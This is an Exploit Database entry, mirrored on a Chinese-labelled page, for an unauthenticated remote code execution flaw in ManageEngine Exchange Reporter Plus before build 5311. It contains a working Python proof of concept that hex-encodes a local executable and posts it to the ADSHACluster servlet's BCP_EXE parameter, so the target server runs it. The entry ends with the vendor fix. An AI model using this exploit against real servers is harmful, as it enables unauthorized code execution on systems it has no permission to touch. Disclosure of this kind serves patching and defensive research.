ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution

• Exploit Database
• 118 阅读

• 作者： Kacper Szurek
  日期： 2018-07-04
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/44975/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51

  # Exploit Title: ManageEngine Exchange Reporter Plus <= 5310 Unauthenticated RCE # Date: 28-06-2018 # Software Link: https://www.manageengine.com/products/exchange-reports/ # Exploit Author: Kacper Szurek # Contact: https://twitter.com/KacperSzurek # Website: https://security.szurek.pl/ # YouTube: https://www.youtube.com/c/KacperSzurek # Category: remote 1. Description   Java servlet <code>ADSHACluster</code> executes <code>bcp.exe</code> file which can be passed using <code>BCP_EXE</code> param.   https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html   2. Proof of Concept </code><code>python import urllib   file_to_execute = "calc.exe" ip = "192.168.1.105"   def to_hex(s): lst = [] for ch in s: hv = hex(ord(ch)).replace(&apos;0x&apos;, &apos;&apos;) if len(hv) == 1: hv = &apos;0&apos;+hv lst.append(hv)   return reduce(lambda x,y:x+y, lst)   print "ManageEngine Exchange Reporter Plus <= 5310" print "Unauthenticated Remote Code Execution" print "by Kacper Szurek" print "https://security.szurek.pl/" print "https://twitter.com/KacperSzurek" print "https://www.youtube.com/c/KacperSzurek"   params = urllib.urlencode({&apos;MTCALL&apos;: "nativeClient", "BCP_RLL" : "0102", &apos;BCP_EXE&apos;: to_hex(open(file_to_execute, "rb").read())}) f = urllib.urlopen("http://{}:8181/exchange/servlet/ADSHACluster".format(ip), params) if &apos;{"STATUS":"error"}&apos; in f.read(): print "OK" else: print "ERROR" </code><code> 3. Solution: Update to version 5311 https://www.manageengine.com/products/exchange-reports/release-notes.html